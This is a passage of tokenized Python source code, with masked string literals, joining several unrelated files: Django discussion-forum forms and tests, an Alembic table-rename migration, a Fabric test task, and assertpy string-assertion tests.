u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> } <EOL> class CourseDiscussionThreadForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = CourseDiscussionThread <EOL> fields = [ '<STR_LIT:title>' , '<STR_LIT:text>' ] <EOL> labels = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' , <EOL> } <EOL> widgets = { <EOL> '<STR_LIT:title>' : TextInput ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> '<STR_LIT:text>' : Textarea ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> } <EOL> class CourseDiscussionPostForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = CourseDiscussionPost <EOL> fields = [ '<STR_LIT:title>' , '<STR_LIT:text>' ] <EOL> labels = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' , <EOL> } <EOL> widgets = { <EOL> '<STR_LIT:title>' : TextInput ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> '<STR_LIT:text>' : Textarea ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> } </s>
<s> from django . core . urlresolvers import resolve <EOL> from django . http import HttpRequest <EOL> from django . http import QueryDict <EOL> from django . test import TestCase <EOL> from django . test import Client <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . auth import authenticate , login , logout <EOL> from django . contrib . auth . decorators import login_required <EOL> import json <EOL> from account . models import Teacher <EOL> from registrar . models import Course <EOL> from registrar . models import CourseDiscussionPost <EOL> from registrar . models import CourseDiscussionThread <EOL> from teacher . views import discussion <EOL> TEST_USER_EMAIL = "<STR_LIT>" <EOL> TEST_USER_USERNAME = "<STR_LIT>" <EOL> TEST_USER_PASSWORD = "<STR_LIT>" <EOL> TEST_USER_EMAIL2 = "<STR_LIT>" <EOL> TEST_USER_USERNAME2 = "<STR_LIT>" <EOL> TEST_USER_PASSWORD2 = "<STR_LIT>" <EOL> class DiscussionTestCase ( TestCase ) : <EOL> def tearDown ( self ) : <EOL> courses = Course . objects . all ( ) <EOL> for course in courses : <EOL> course . delete ( ) <EOL> User . objects . all ( ) . delete ( ) <EOL> def setUp ( self ) : <EOL> User . objects . create_user ( <EOL> email = TEST_USER_EMAIL2 , <EOL> username = TEST_USER_USERNAME2 , <EOL> password = TEST_USER_PASSWORD2 <EOL> ) <EOL> user = User . objects . get ( email = TEST_USER_EMAIL2 ) <EOL> teacher = Teacher . objects . create ( user = user ) <EOL> User . objects . create_user ( <EOL> email = TEST_USER_EMAIL , <EOL> username = TEST_USER_USERNAME , <EOL> password = TEST_USER_PASSWORD <EOL> ) <EOL> user = User . objects . get ( email = TEST_USER_EMAIL ) <EOL> teacher = Teacher . objects . create ( user = user ) <EOL> Course . objects . create ( <EOL> id = <NUM_LIT:1> , <EOL> title = "<STR_LIT>" , <EOL> sub_title = "<STR_LIT>" , <EOL> category = "<STR_LIT>" , <EOL> teacher = teacher , <EOL> ) <EOL> course = Course . objects . get ( id = <NUM_LIT:1> ) <EOL> user = User . objects . get ( email = TEST_USER_EMAIL ) <EOL> CourseDiscussionThread . objects . create ( <EOL> thread_id = <NUM_LIT:1> , <EOL> title = "<STR_LIT>" , <EOL> text = "<STR_LIT>" , <EOL> user = user , <EOL> course = course , <EOL> ) <EOL> CourseDiscussionPost . objects . create ( <EOL> post_id = <NUM_LIT:1> , <EOL> user = user , <EOL> title = '<STR_LIT>' , <EOL> text = '<STR_LIT>' <EOL> ) <EOL> thread = CourseDiscussionThread . objects . get ( thread_id = <NUM_LIT:1> ) <EOL> post = CourseDiscussionPost . objects . get ( post_id = <NUM_LIT:1> ) <EOL> thread . posts . add ( post ) <EOL> def get_logged_in_client ( self ) : <EOL> client = Client ( ) <EOL> client . login ( <EOL> username = TEST_USER_USERNAME , <EOL> password = TEST_USER_PASSWORD <EOL> ) <EOL> return client <EOL> def get_logged_in_trudy_client ( self ) : <EOL> client = Client ( ) <EOL> client . login ( <EOL> username = TEST_USER_USERNAME2 , <EOL> password = TEST_USER_PASSWORD2 <EOL> ) <EOL> return client <EOL> def test_url_resolves_to_discussion_page_view ( self ) : <EOL> found = resolve ( '<STR_LIT>' ) <EOL> self . assertEqual ( found . func , discussion . discussion_page ) <EOL> def test_discussion_page_without_thread ( self ) : <EOL> CourseDiscussionThread . objects . get ( <EOL> thread_id = <NUM_LIT:1> <EOL> ) . delete ( ) <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> def test_discussion_page_with_thread ( self ) : <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> def test_threads_table_without_thread ( self ) : <EOL> CourseDiscussionThread . objects . get ( <EOL> thread_id = <NUM_LIT:1> <EOL> ) . delete ( ) <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_threads_table_with_thread ( self ) : <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> def test_new_thread_modal ( self ) : <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> def test_insert_thread ( self ) : <EOL> CourseDiscussionThread . objects . get ( <EOL> thread_id = <NUM_LIT:1> <EOL> ) . delete ( ) <EOL> kwargs = { '<STR_LIT>' : '<STR_LIT>' } <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' , { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' <EOL> } , ** kwargs ) <EOL> json_string = response . content . decode ( encoding = '<STR_LIT>' ) <EOL> array = json . loads ( json_string ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( array [ '<STR_LIT:message>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( array [ '<STR_LIT:status>' ] , '<STR_LIT:success>' ) <EOL> def test_delete_thread_with_thread_and_correct_user ( self ) : <EOL> kwargs = { '<STR_LIT>' : '<STR_LIT>' } <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } , ** kwargs ) <EOL> json_string = response . content . decode ( encoding = '<STR_LIT>' ) <EOL> array = json . loads ( json_string ) <EOL> self . assertEqual ( array [ '<STR_LIT:status>' ] , '<STR_LIT:success>' ) <EOL> self . assertEqual ( array [ '<STR_LIT:message>' ] , '<STR_LIT>' ) <EOL> def test_delete_thread_with_empty ( self ) : <EOL> CourseDiscussionThread . objects . all ( ) . delete ( ) <EOL> kwargs = { '<STR_LIT>' : '<STR_LIT>' } <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } , ** kwargs ) <EOL> json_string = response . content . decode ( encoding = '<STR_LIT>' ) <EOL> array = json . loads ( json_string ) <EOL> self . assertEqual ( array [ '<STR_LIT:status>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( array [ '<STR_LIT:message>' ] , '<STR_LIT>' ) <EOL> def test_delete_thread_with_thread_and_incorrect_user ( self ) : <EOL> kwargs = { '<STR_LIT>' : '<STR_LIT>' } <EOL> client = self . get_logged_in_trudy_client ( ) <EOL> response = client . post ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } , ** kwargs ) <EOL> json_string = response . content . decode ( encoding = '<STR_LIT>' ) <EOL> array = json . loads ( json_string ) <EOL> self . assertEqual ( array [ '<STR_LIT:status>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( array [ '<STR_LIT:message>' ] , '<STR_LIT>' ) <EOL> def test_url_resolves_to_posts_page_view ( self ) : <EOL> found = resolve ( '<STR_LIT>' ) <EOL> self . assertEqual ( found . func , discussion . posts_page ) <EOL> def test_posts_page ( self ) : <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> def test_post_table ( self ) : <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> def test_new_post_modal ( self ) : <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> def test_insert_post ( self ) : <EOL> CourseDiscussionPost . objects . get ( <EOL> post_id = <NUM_LIT:1> <EOL> ) . delete ( ) <EOL> kwargs = { '<STR_LIT>' : '<STR_LIT>' } <EOL> client = self . get_logged_in_client ( ) <EOL> response = client . post ( '<STR_LIT>' , { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' <EOL> } , ** kwargs ) <EOL> json_string = response . content . decode ( encoding = '<STR_LIT>' ) <EOL> array = json . loads ( json_string ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( array [ '<STR_LIT:message>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( array [ '<STR_LIT:status>' ] , '<STR_LIT:success>' ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> branch_labels = None <EOL> depends_on = None <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . rename_table ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . rename_table ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def downgrade ( ) : <EOL> op . rename_table ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . rename_table ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import sys <EOL> import os <EOL> import os . path as P <EOL> from fabric . api import * <EOL> sys . path . append ( P . abspath ( <EOL> P . join ( P . dirname ( __file__ ) , '<STR_LIT>' ) ) ) <EOL> import venv <EOL> local = venv . local <EOL> clean = venv . clean <EOL> init = venv . init <EOL> def test ( k = None ) : <EOL> """<STR_LIT>""" <EOL> venv . install ( '<STR_LIT>' ) <EOL> py_test = venv . get_script ( '<STR_LIT>' ) <EOL> test_script = P . join ( '<STR_LIT>' , '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> if not P . exists ( '<STR_LIT>' ) : <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> if k is not None : <EOL> args = "<STR_LIT>" + k <EOL> else : <EOL> args = "<STR_LIT>" <EOL> local ( <EOL> '<STR_LIT>' . format ( py_test , test_script , args ) , <EOL> capture = False ) <EOL> def tox ( ) : <EOL> """<STR_LIT>""" <EOL> if not P . exists ( '<STR_LIT>' ) : <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> venv . tox ( ) </s>
<s> from assertpy import assert_that , fail <EOL> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:3> : <EOL> unicode = str <EOL> else : <EOL> unicode = unicode <EOL> class TestString ( object ) : <EOL> def test_is_length ( self ) : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_length ( <NUM_LIT:3> ) <EOL> def test_is_length_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_length ( <NUM_LIT:4> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_contains ( self ) : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains ( '<STR_LIT:f>' ) <EOL> assert_that ( '<STR_LIT:foo>' ) . contains ( '<STR_LIT:o>' ) <EOL> assert_that ( '<STR_LIT:foo>' ) . contains ( '<STR_LIT>' , '<STR_LIT:o>' ) <EOL> assert_that ( '<STR_LIT>' ) . contains ( '<STR_LIT:d>' ) <EOL> assert_that ( '<STR_LIT>' ) . contains ( '<STR_LIT>' , '<STR_LIT:e>' , '<STR_LIT:d>' ) <EOL> def test_contains_single_item_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains ( '<STR_LIT:x>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_contains_multi_item_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains ( '<STR_LIT:f>' , '<STR_LIT:x>' , '<STR_LIT:z>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( "<STR_LIT>" ) <EOL> def test_contains_ignoring_case ( self ) : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( '<STR_LIT:f>' ) <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( '<STR_LIT:F>' ) <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( '<STR_LIT:f>' , '<STR_LIT:o>' , '<STR_LIT:F>' , '<STR_LIT:O>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_contains_ignoring_case_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . contains_ignoring_case ( '<STR_LIT:f>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_contains_ignoring_case_missinge_item_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_contains_ignoring_case_single_item_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( '<STR_LIT:X>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_contains_ignoring_case_single_item_type_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( <NUM_LIT:12> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_contains_ignoring_case_multi_item_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( '<STR_LIT:F>' , '<STR_LIT:X>' , '<STR_LIT>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( "<STR_LIT>" ) <EOL> def test_contains_ignoring_case_multi_item_type_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . contains_ignoring_case ( '<STR_LIT:F>' , <NUM_LIT:12> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_does_not_contain ( self ) : <EOL> assert_that ( '<STR_LIT:foo>' ) . does_not_contain ( '<STR_LIT:x>' ) <EOL> assert_that ( '<STR_LIT:foo>' ) . does_not_contain ( '<STR_LIT:x>' , '<STR_LIT:y>' ) <EOL> def test_does_not_contain_single_item_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . does_not_contain ( '<STR_LIT:f>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_does_not_contain_list_item_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . does_not_contain ( '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:f>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( "<STR_LIT>" ) <EOL> def test_is_empty ( self ) : <EOL> assert_that ( '<STR_LIT>' ) . is_empty ( ) <EOL> def test_is_empty_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_empty ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_not_empty ( self ) : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_not_empty ( ) <EOL> def test_is_not_empty_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_not_empty ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_equal_ignoring_case ( self ) : <EOL> assert_that ( '<STR_LIT>' ) . is_equal_to_ignoring_case ( '<STR_LIT:foo>' ) <EOL> assert_that ( '<STR_LIT:foo>' ) . is_equal_to_ignoring_case ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . is_equal_to_ignoring_case ( '<STR_LIT:foo>' ) <EOL> def test_is_equal_ignoring_case_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_equal_to_ignoring_case ( '<STR_LIT:bar>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_equal_ignoring_case_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . is_equal_to_ignoring_case ( <NUM_LIT:12> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_equal_ignoring_case_bad_arg_type_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_equal_to_ignoring_case ( <NUM_LIT:12> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_starts_with ( self ) : <EOL> assert_that ( '<STR_LIT>' ) . starts_with ( '<STR_LIT:f>' ) <EOL> assert_that ( '<STR_LIT>' ) . starts_with ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . starts_with ( '<STR_LIT>' ) <EOL> def test_starts_with_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . starts_with ( '<STR_LIT:bar>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_starts_with_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . starts_with ( <NUM_LIT:12> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_starts_with_bad_arg_none_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . starts_with ( None ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_starts_with_bad_arg_type_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . starts_with ( <NUM_LIT> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_starts_with_bad_arg_empty_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . starts_with ( '<STR_LIT>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_ends_with ( self ) : <EOL> assert_that ( '<STR_LIT>' ) . ends_with ( '<STR_LIT:d>' ) <EOL> assert_that ( '<STR_LIT>' ) . ends_with ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . ends_with ( '<STR_LIT>' ) <EOL> def test_ends_with_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . ends_with ( '<STR_LIT:bar>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_ends_with_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . ends_with ( <NUM_LIT:12> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_ends_with_bad_arg_none_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . ends_with ( None ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_ends_with_bad_arg_type_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . ends_with ( <NUM_LIT> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_ends_with_bad_arg_empty_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . ends_with ( '<STR_LIT>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_matches ( self ) : <EOL> assert_that ( '<STR_LIT>' ) . matches ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . matches ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . matches ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . matches ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . matches ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . matches ( '<STR_LIT>' ) <EOL> def test_matches_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . matches ( '<STR_LIT>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_matches_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . matches ( <NUM_LIT:12> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_matches_bad_arg_type_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . matches ( <NUM_LIT> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_matches_bad_arg_empty_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . matches ( '<STR_LIT>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_does_not_match ( self ) : <EOL> assert_that ( '<STR_LIT>' ) . does_not_match ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . does_not_match ( '<STR_LIT>' ) <EOL> assert_that ( '<STR_LIT>' ) . does_not_match ( '<STR_LIT>' ) <EOL> def test_does_not_match_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . does_not_match ( '<STR_LIT>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_does_not_match_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . does_not_match ( <NUM_LIT:12> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_does_not_match_bad_arg_type_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . does_not_match ( <NUM_LIT> ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_does_not_match_bad_arg_empty_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . does_not_match ( '<STR_LIT>' ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_alpha ( self ) : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_alpha ( ) <EOL> def test_is_alpha_digit_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_alpha ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_alpha_space_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_alpha ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_alpha_punctuation_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_alpha ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_alpha_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . is_alpha ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_alpha_empty_value_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_alpha ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_digit ( self ) : <EOL> assert_that ( '<STR_LIT>' ) . is_digit ( ) <EOL> def test_is_digit_alpha_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_digit ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_digit_space_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_digit ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_digit_punctuation_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_digit ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except AssertionError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_digit_bad_value_type_failure ( self ) : <EOL> try : <EOL> assert_that ( <NUM_LIT> ) . is_digit ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except TypeError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_digit_empty_value_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_digit ( ) <EOL> fail ( '<STR_LIT>' ) <EOL> except ValueError as ex : <EOL> assert_that ( str ( ex ) ) . is_equal_to ( '<STR_LIT>' ) <EOL> def test_is_lower ( self ) : <EOL> assert_that ( '<STR_LIT:foo>' ) . is_lower ( ) <EOL> assert_that ( '<STR_LIT>' ) . is_lower ( ) <EOL> assert_that ( '<STR_LIT>' ) . is_lower ( ) <EOL> def test_is_lower_failure ( self ) : <EOL> try : <EOL> assert_that ( '<STR_LIT>' ) . is_lower ( ) <EOL> 